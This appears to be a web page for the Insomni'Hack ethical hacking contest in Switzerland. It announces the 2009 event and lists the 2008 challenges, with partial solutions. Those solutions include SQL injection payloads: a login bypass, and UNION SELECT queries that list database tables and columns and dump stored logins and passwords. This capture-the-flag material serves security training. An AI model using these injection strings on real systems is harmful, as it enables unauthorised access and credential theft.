Insomni'hack Contest : Ethical Hacking
 Insomni'Hack 09
After the success of last years first edition, Insomni'Hack will be back in 2009. It will be held on Friday February 6th 2009
The exact location is not yet know, but it will be somewhere in the western part of Switzerland. Additional information will be made available on this web site as soon as possible.
Get ready to measure your hacking skills against the different challenges that cover a vast area of inofrmation security in the biggest hacking contest in western Switzerland.
If you wish to register to the event, please send an email with insomnihack 09 in the subject line to :
We are looking forward to seeing you there!
 Insomni'Hack 08
08th February 2008, SCRT has organized the first ethical hacking contest in Western Switzerland.
The contest is now over
Extrait vidéo
the challenges
We will present here some solutions to the challenges
| No |
Challange name |
Points |
Access |
| - |
- |
- |
|
| 1 |
Methadone |
200 |
hackthis.insomni.hack/methadone |
| 6 |
Highlander |
600 |
begin.insomni.hack |
| 8 |
Oxymore |
200 |
hackthis.insomni.hack/oxymore |
| 9 |
NoNo |
100 |
hackthis.insomni.hack/NoNo |
| 5 |
Ventriloque |
600 |
www.insomni.hack/ventriloque |
| 3 |
Cherche&Trouve |
1000 |
www.insomni.hack/cherche&trouve |
| 2 |
Héroïne |
800 |
hackthis.insomni.hack/heroine |
| 7 |
Cascade Scoubidou |
200 |
www.insomni.hack/cascade |
| 7 |
Cascade orthodoxe |
400 |
www.insomni.hack/cascade |
| 7 |
Cascade de chiffres |
600 |
www.insomni.hack/cascade |
| 7 |
Cascade old-school |
800 |
www.insomni.hack/cascade |
| 10 |
OUAIP |
500 |
|
Epreuve 1 : méthadone
Simple injection SQL
OR 'x'='x permettait de contourner la protection par login mot de passe.
Epreuve 2 : Heroïne
Harder SQL Injection
Here are the steps to pass this challenge
Find the right table : ' OR 'x'='x' union select table_name,table_type,table_schema from information_schema.tables where 'x'='x
Or find directly the right column : ' ' OR 'x'='x' union select table_name,column_name,table_schema from information_schema.columns where 'x'='x
SELECT
* FROM hackthis_BDD.membres WHERE identifiant = 'toto' AND motpasse = '
' OR 'x'='x' union select table_name,table_schema,column_name from
information_schema.columns where 'x'='x'
get the login/password: ' OR 'x'='x' union select * from membres where 'x'='x
Epreuve 7 : Cascade
Solution de l'épreuve 7 (Cascade) préparée par Bruno Kerouanton
|
